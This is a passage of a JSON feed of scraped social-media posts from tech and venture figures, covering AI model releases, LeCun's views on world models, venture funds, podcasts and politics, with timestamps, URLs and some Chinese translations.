good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look more marshmallowy and cuddly proves that imo", + "url": "https://nitter.net/images_i_love3/status/2048061157685010444#m", + "published_at": "2026-04-25T15:26:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back.\n\nElon said it. Aravind from Perplexity agrees. And startups are already making it a reality.\n\ncc: @elonmusk, @AravSrinivas, @Jason, @perplexity_ai, @ThisWeeknAI", + "url": "https://nitter.net/twistartups/status/2048057234865693125#m", + "published_at": "2026-04-25T15:11:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter", + "title_zh": "@paulg转发:23岁、没有接受过高级数学训练的业余爱好者使用ChatGPT Pro解决了埃尔德什问题。陶哲轩(Terence Tao)表示:\"有迹象表明这个难题可能比预期的更容易,我们之前或许存在某种思维障碍。\" https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. \n\nHere are some of his insights from his visit to my Lab.\n\n@FutureJurvetson @Stanford @DigEconLab", + "url": "https://nitter.net/erikbryn/status/2047874760542200042#m", + "published_at": "2026-04-25T03:06:05+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these lunatics up to…", + "url": "https://nitter.net/Jason/status/2047858837319774540#m", + "published_at": "2026-04-25T02:02:48+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional economic indicators. https://digitaleconomy.stanford.edu/publication/what-is-generative-ai-worth/", + "url": "https://nitter.net/RonnieChatterji/status/2047821064437424288#m", + "published_at": "2026-04-24T23:32:43+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess.\n\nLAMAT is fixing the chaos. It's a marketplace that lets organizations discover, book, and manage every event service on a single platform.", + "url": "https://nitter.net/LAUNCH/status/2047813100091449428#m", + "published_at": "2026-04-24T23:01:04+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter", + "title_zh": "GPT-5.5和GPT-5.5 Pro现已通过API上线!" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Baby’s first con", + "url": "https://nitter.net/Aaron_Margolin/status/2047748882952778044#m", + "published_at": "2026-04-24T18:45:53+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter", + "title_zh": "@ylecun 转发:网页正在消失 🕳️\n根据皮尤研究中心的报告,2013-2023年间,26%的页面已无法访问。\n但这并不是全部。\n在互联网档案馆《2026年消失文化的报告》一书中,与网络时光机合作的数据科学家发现:\n通过时光档案机恢复的:16%\n在消失前已保存的:56%\n保存是应对文化流失的办法。\n📚 在互联网档案馆免费阅读《消失文化》\n📖 下载阅读:https://archive.org/details/vanishing-culture-2026\n🛒 印刷版购买:https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n#消失文化 #数字记忆 #互联网档案馆 #纸书推" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!", + "url": "https://nitter.net/tokidoki/status/2047723587528782152#m", + "published_at": "2026-04-24T17:05:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Good morning! Rise and shine, gamers!", + "url": "https://nitter.net/shopculturefly/status/2047711254379393160#m", + "published_at": "2026-04-24T16:16:22+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter", + "title_zh": "转自@ylecun:在达沃斯论坛,图灵奖得主、AI三巨头之一的LeCun发表了一场直指核心的演讲,掀开了整个硅谷的遮羞布。\n\n他说现在整个行业都被LLM彻底洗脑,所有人都在同一个赛道上疯狂挖角、相互竞争,偏离主流就会被骂落伍,这才是一直以来他离开Meta的真正原因,即使是Meta内部也已经LLM上头,他选择不再随波逐流。\n\n最令人震撼的话是:仅靠生成式结构(不管是LLM、VLM还是VLA)永远造不出甚至猫一样水平的智能体。因为它们本质上只是下一个token预测机,只能在文字和像素空间进行统计关联,从未真正理解世界的因果机制。\n它们不懂预测行动后果,不懂真正规划,也没有常识。\n\n当然,我不是说LLM没有用。短期内,扩大LLM+微调+工具调用已经可以替代80%的白领工作。所有人疯狂涌入这个领域,看似疯狂其实完全理性,因为钱和机会确实在这里。\n\n但长期看,这条路有天花板。你永远无法通过文字地图驶出一辆真正的汽车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些挑战纯LLM永远无法克服。\n\nLeCun认为,真正的智能必须拥有世界模型,即在任何状态和动作下,都要能精准预测下一秒世界的样子。\n这不仅仅是像素级的生成,更需要抽象建模物理规律与因果关系。\n\n近期Figure、特斯拉、谷歌的机器人项目其实都在秘密补上这一课,只是没人愿公开说LLM不是万能地基。\n\n我预见未来智能体系一定是混合架构:LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层则将计划转化为具体行动。\n\nLeCun从未否定LLM价值,他反对的只是LLM作为万能解决方案的心态。\n\n硅谷当前最大的问题不是内卷,而是所有人将竞赛激烈化的同时,正集体遗忘终点根本不在那条赛道上。\n\n世界模型这个门槛终将被跨越——首先突破者,就是下一个时代真正的赢家。\n#YannLeCun#" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "Im genuinely this Close to killing myself rn & this Shit happens like Okay", + "url": "https://nitter.net/satoshibun/status/2047641832624893993#m", + "published_at": "2026-04-24T11:40:30+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot 